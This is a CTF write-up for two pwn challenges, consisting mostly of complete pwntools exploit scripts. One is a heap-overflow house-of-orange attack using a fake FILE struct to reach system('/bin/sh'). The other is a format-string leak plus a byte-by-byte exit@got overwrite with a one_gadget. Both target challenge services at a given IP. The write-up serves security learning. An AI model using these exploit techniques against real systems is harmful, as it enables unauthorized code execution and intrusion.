2020纵横杯 pwn writeup

wind_farm_panel

堆溢出,没有free,house of orange 一把梭

#coding:utf-8
from pwn import *
import sys

# Target selection: 0 = connect to the remote challenge service, 1 = spawn the
# binary locally (see the if/else below).
local = 0
# Open gdb in a horizontal tmux split when debug() attaches.
context.terminal=['tmux','splitw','-h']
# `python exp.py DEBUG` makes pwntools echo every send/recv.
if len(sys.argv) == 2 and (sys.argv[1] == 'DEBUG' or sys.argv[1] == 'debug'):
    context.log_level = 'debug'

if local:
    p = process('./pwn')
    elf = ELF('./pwn')
    libc = elf.libc
else:
    # Host/port as recorded in the original writeup.
    p = remote("182.92.203.154","28452")
    elf = ELF('./pwn')
    # NOTE(review): elf.libc is the libc the local loader resolves for ./pwn;
    # the symbol offsets used later assume the remote libc is the same build.
    libc = elf.libc

#内存地址随机化
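def debug(addr=0, PIE=True):
    """Attach gdb to the target with a breakpoint at *addr*.

    Args:
        addr: breakpoint address; an offset into the binary when ``PIE`` is
            true, an absolute address otherwise.
        PIE: when true, the start of the first mapping reported by
            ``pmap <pid>`` is taken as the image base and added to ``addr``.
    """
    if PIE:
        # `pmap` prints a header line first, so readlines()[1] is the first
        # mapping; its start address is used as the load base of ./pwn
        # (NOTE(review): assumes the binary is the lowest mapping — confirm).
        text_base = int(os.popen("pmap {}| awk '{{print $1}}'".format(p.pid)).readlines()[1], 16)
        bp = text_base + addr
        # Print the address the breakpoint is actually set on; the original
        # printed text_base + 0x202040 regardless of addr, which was
        # misleading when reading the log.
        print("breakpoint_addr --> " + hex(bp))
        gdb.attach(p, 'b *{}'.format(hex(bp)))
    else:
        gdb.attach(p, "b *{}".format(hex(addr)))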

# Short wrappers around the tube `p` so the exploit body stays compact.
def sd(s):
    """Send *s* as-is."""
    return p.send(s)


def rc(s):
    """Receive up to *s* bytes."""
    return p.recv(s)


def sl(s):
    """Send *s* followed by a newline."""
    return p.sendline(s)


def ru(s):
    """Receive until the delimiter *s* is seen."""
    return p.recvuntil(s)


def sda(a, s):
    """Wait for *a*, then send *s* as-is."""
    return p.sendafter(a, s)


def sla(a, s):
    """Wait for *a*, then send *s* plus a newline."""
    return p.sendlineafter(a, s)

def pack_file(_flags = 0,
              _IO_read_ptr = 0,
              _IO_read_end = 0,
              _IO_read_base = 0,
              _IO_write_base = 0,
              _IO_write_ptr = 0,
              _IO_write_end = 0,
              _IO_buf_base = 0,
              _IO_buf_end = 0,
              _IO_save_base = 0,
              _IO_backup_base = 0,
              _IO_save_end = 0,
              _IO_marker = 0,
              _IO_chain = 0,
              _fileno = 0,
              _lock = 0,
              _wide_data = 0,
              _mode = 0):
    """Serialise a 0xd8-byte fake FILE object.

    Parameters are named after the glibc ``_IO_FILE`` fields they fill
    (64-bit layout); anything not given is zero, and the gaps between the
    fields written here are zero-padded.

    Returns:
        A Python 2 ``str`` of exactly 0xd8 bytes.
    """
    # 0x00: _flags (4 bytes) plus 4 bytes of padding, then the thirteen
    # pointer-sized fields at 0x08..0x68, and _fileno (4 bytes) at 0x70.
    file_struct = p32(_flags) + \
        p32(0) + \
        p64(_IO_read_ptr) + \
        p64(_IO_read_end) + \
        p64(_IO_read_base) + \
        p64(_IO_write_base) + \
        p64(_IO_write_ptr) + \
        p64(_IO_write_end) + \
        p64(_IO_buf_base) + \
        p64(_IO_buf_end) + \
        p64(_IO_save_base) + \
        p64(_IO_backup_base) + \
        p64(_IO_save_end) + \
        p64(_IO_marker) + \
        p64(_IO_chain) + \
        p32(_fileno)
    # Zero-fill 0x74..0x88; _lock is stored at 0x88.
    file_struct = file_struct.ljust(0x88, "\x00")
    file_struct += p64(_lock)
    # _wide_data at 0xa0.
    file_struct = file_struct.ljust(0xa0, "\x00")
    file_struct += p64(_wide_data)
    # _mode at 0xc0 (written as a whole qword).
    file_struct = file_struct.ljust(0xc0, '\x00')
    file_struct += p64(_mode)
    # Pad to the full 0xd8-byte size.
    file_struct = file_struct.ljust(0xd8, "\x00")
    return file_struct

def pack_file_flush_str_jumps(_IO_str_jumps_addr, _IO_list_all_ptr, system_addr, binsh_addr):
    """Build the fake FILE used by house_of_orange_payload().

    The 0xd8-byte struct from pack_file() is followed by the vtable pointer
    (``_IO_str_jumps - 8``), one qword of padding and ``system_addr``.  The
    field values below are the ones the original author chose for this libc.

    Args:
        _IO_str_jumps_addr: absolute address of ``_IO_str_jumps``.
        _IO_list_all_ptr: absolute address of ``_IO_list_all``.
        system_addr: absolute address of ``system``.
        binsh_addr: absolute address of a ``/bin/sh`` string.

    Returns:
        The payload as a Python 2 ``str`` (0xd8 + 3 * 8 bytes).
    """
    payload = pack_file(_flags = 0,
        _IO_read_ptr = 0x61, #smallbin4file_size
        _IO_read_base = _IO_list_all_ptr-0x10, # unsorted bin attack _IO_list_all_ptr,
        _IO_write_base = 0,
        _IO_write_ptr = 1,
        _IO_buf_base = binsh_addr,
        _mode = 0,
        )
    payload += p64(_IO_str_jumps_addr-8) # vtable
    payload += p64(0) # padding
    payload += p64(system_addr)
    return payload

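def get_io_str_jumps_offset(libc):
    """Locate ``_IO_str_jumps`` in *libc*, which has no exported symbol.

    The library is scanned for references to ``_IO_str_underflow``; the code
    assumes that reference sits 0x20 bytes into the jump table, and accepts
    the first candidate table that lies after ``_IO_file_jumps``.

    Args:
        libc: a pwntools ``ELF`` for the target libc.

    Returns:
        The offset of ``_IO_str_jumps`` relative to the libc image base.

    Raises:
        ValueError: if no candidate is found.  The original returned ``None``
            here, which only surfaced later as a ``TypeError`` in the caller's
            ``libc_base + offset`` arithmetic.
    """
    IO_file_jumps_offset = libc.sym['_IO_file_jumps']
    IO_str_underflow_offset = libc.sym['_IO_str_underflow']
    for ref_offset in libc.search(p64(IO_str_underflow_offset)):
        candidate = ref_offset - 0x20
        # Tables before _IO_file_jumps are other vtables referencing the
        # same function; the first one after it is taken as _IO_str_jumps.
        if candidate > IO_file_jumps_offset:
            return candidate
    raise ValueError("_IO_str_jumps not found: no reference to _IO_str_underflow after _IO_file_jumps")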

def house_of_orange_payload(libc, libc_base):
    """Resolve the libc addresses the fake FILE needs and build the payload.

    Args:
        libc: pwntools ``ELF`` of the target libc.
        libc_base: runtime load address of that libc.

    Returns:
        The bytes produced by pack_file_flush_str_jumps().
    """
    sym = libc.symbols
    str_jumps = libc_base + get_io_str_jumps_offset(libc)
    list_all = libc_base + sym['_IO_list_all']
    system_addr = libc_base + sym['system']
    binsh = libc_base + next(libc.search('/bin/sh'))
    return pack_file_flush_str_jumps(str_jumps, list_all, system_addr, binsh)

def show(name, addr):
    """Log *addr* in hex under the label *name* via pwntools' ``log.info``."""
    fmt = name + " --> %s"
    log.info(fmt, hex(addr))

def choice(idx):
    """Pick menu entry *idx* at the ``>> `` prompt."""
    sla(">> ", "%s" % (idx,))

def add(idx, size, data):
    """Menu option 1: create turbine *idx* of *size* and send *data* as its name (raw, no newline)."""
    choice(1)
    for prompt, value in (("): ", idx), ("turbine: ", size)):
        sla(prompt, "%s" % (value,))
    sda("name: ", data)

def view(idx):
    """Menu option 2: display turbine *idx*."""
    choice(2)
    which = "%s" % (idx,)
    sla("viewed: ", which)

def edit(idx, data):
    """Menu option 3: replace turbine *idx*'s contents with *data* (raw, no newline)."""
    choice(3)
    which = "%s" % (idx,)
    sla("turbine: ", which)
    sda("input: ", data)

# ---- exploitation sequence (every constant is specific to this binary/libc) ----
# Entry 0 is requested with size 0x100 but 0x110 bytes are sent: the trailing
# qword is meant to land on the next chunk's size field and set it to 0xef1
# (the heap overflow described in the writeup).
pay = 0x108*'a' + p64(0xef1)
add(0,0x100,pay)
# A 0xf00-byte request (larger than the 0xef1 written above), then a small
# entry whose contents are displayed.
add(1,0xf00,'bbb')
add(2,0x80,'a')
view(2)
ru("turbine is ")
# Six bytes of the echoed pointer; 1601 is the author's distance from that
# pointer to main_arena (NOTE(review): libc-build specific — confirm).
main_arena = u64(rc(6).ljust(8,'\x00')) - 1601
malloc_hook = main_arena - 0x10
libc_base = malloc_hook - libc.symbols['__malloc_hook']
show("main_arena",main_arena)
show("libc_base",libc_base)
pay = house_of_orange_payload(libc,libc_base)

# Rewrite entry 0 with 0x190 bytes of filler followed by the fake FILE, so the
# payload presumably lands in the chunk that follows entry 0.
edit(0,0x190*'a' + pay)
# debug()
# One more "add" (entry 3, size 0x100) is the trigger.
choice(1)
sla("): ",str(3))
sla("turbine: ",str(0x100))
# debug()


p.interactive()

shell

格式化字符串漏洞,藏在eval -> builtin_cmd -> do_bgfg里面

got表可写,且可向栈写入数据,所以直接改exit@got即可

#coding:utf-8
from pwn import *
import sys

# Target selection: 1 = spawn the binary locally, 0 = connect to the remote
# challenge service (see the if/else below).
local = 1
# Open gdb in a horizontal tmux split when debug() attaches.
context.terminal=['tmux','splitw','-h']
# `python exp.py DEBUG` makes pwntools echo every send/recv.
if len(sys.argv) == 2 and (sys.argv[1] == 'DEBUG' or sys.argv[1] == 'debug'):
    context.log_level = 'debug'

if local:
    p = process('./pwn')
    elf = ELF('./pwn',checksec = False)
    libc = elf.libc
else:
    # Host/port as recorded in the original writeup.
    p = remote("182.92.203.154","35264")
    elf = ELF('./pwn',checksec = False)
    # NOTE(review): elf.libc is the libc the local loader resolves for ./pwn;
    # the symbol offsets and one_gadget values used later assume the remote
    # libc is the same build.
    libc = elf.libc

#内存地址随机化
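def debug(addr=0, PIE=True):
    """Attach gdb to the target with a breakpoint at *addr*.

    Args:
        addr: breakpoint address; an offset into the binary when ``PIE`` is
            true, an absolute address otherwise.
        PIE: when true, the start of the first mapping reported by
            ``pmap <pid>`` is taken as the image base and added to ``addr``.
    """
    if PIE:
        # `pmap` prints a header line first, so readlines()[1] is the first
        # mapping; its start address is used as the load base of ./pwn
        # (NOTE(review): assumes the binary is the lowest mapping — confirm).
        text_base = int(os.popen("pmap {}| awk '{{print $1}}'".format(p.pid)).readlines()[1], 16)
        bp = text_base + addr
        # Print the address the breakpoint is actually set on; the original
        # printed text_base + 0x202040 regardless of addr, which was
        # misleading when reading the log.
        print("breakpoint_addr --> " + hex(bp))
        gdb.attach(p, 'b *{}'.format(hex(bp)))
    else:
        gdb.attach(p, "b *{}".format(hex(addr)))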

# Short wrappers around the tube `p` so the exploit body stays compact.
def sd(s):
    """Send *s* as-is."""
    return p.send(s)


def rc(s):
    """Receive up to *s* bytes."""
    return p.recv(s)


def sl(s):
    """Send *s* followed by a newline."""
    return p.sendline(s)


def ru(s):
    """Receive until the delimiter *s* is seen."""
    return p.recvuntil(s)


def sda(a, s):
    """Wait for *a*, then send *s* as-is."""
    return p.sendafter(a, s)


def sla(a, s):
    """Wait for *a*, then send *s* plus a newline."""
    return p.sendlineafter(a, s)

def show(name, addr):
    """Log *addr* in hex under the label *name* via pwntools' ``log.info``."""
    fmt = name + " --> %s"
    log.info(fmt, hex(addr))

# debug(0x1616)
# debug(0x1616)
# The shell's `bg` command passes its argument through a format string (the
# do_bgfg bug from the writeup), so one command leaks stack words 10, 11 and
# 303 as hex, separated by '-'.
sla("$ ","bg %10$p-%11$p-%303$p")
# Word 10: a stack address; buf_stack is presumably the input buffer, 0x4f0
# above it.
stack = int(ru('-')[:-1],16)
buf_stack = stack + 0x4f0
# Word 11: a pointer into the PIE image, 0x153b past its base.
text_base = int(ru('-')[:-1],16) - 0x153b
# Word 303: __libc_start_main + 240 (this offset and the ones above are
# binary/libc-build specific).  The leak is terminated by the ':' of the
# shell prompt that follows.
libc_start_main = int(ru(':')[:-1],16) - 240
libc_base = libc_start_main - libc.symbols['__libc_start_main']
exit_got = text_base + elf.got['exit']
printf_got = text_base + elf.got['printf']  # resolved but not used below
show("stack",stack)
show("exit_got",exit_got)
show("text_base",text_base)

# Candidate one_gadget offsets for this libc; only one[0] is used.
one = [0x45226,0x4527a,0xf0364,0xf1207]
main_ret = stack + 0x908  # logged only; not used by change_exit()
onegadget = libc_base + one[0]
show("main_ret",main_ret)
show("buf_stack",buf_stack)
show("onegadget",onegadget)

def change_exit(i):
    """Store byte *i* of ``onegadget`` at ``exit_got + i`` via the ``bg`` format string.

    The payload prints ``offset`` characters and then uses ``%174$hhn`` to
    write that count as a single byte through the pointer appended at offset
    0x10 of the command (stack argument 174).  Uses the module globals
    ``onegadget`` and ``exit_got``.

    Args:
        i: byte index (0..5) of the address being written.
    """
    offset = (onegadget >> 8*i) & 0xff
    pay = "bg "
    pay += "%" + str(offset) + "c%174$hhn"
    # Pad so the target pointer always sits at the same position (0x10).
    pay = pay.ljust(0x10,"A")
    pay += p64(exit_got + i)
    # debug(0x1616)
    sla("$ ",pay)

# Patch exit@got one byte at a time (only the low six bytes are written).
for i in range(6):
    change_exit(i)

# debug(0x1064)
# `quit` presumably ends in a call to exit(), which now goes through the
# patched GOT entry.
sla("$ ",'quit')
p.interactive()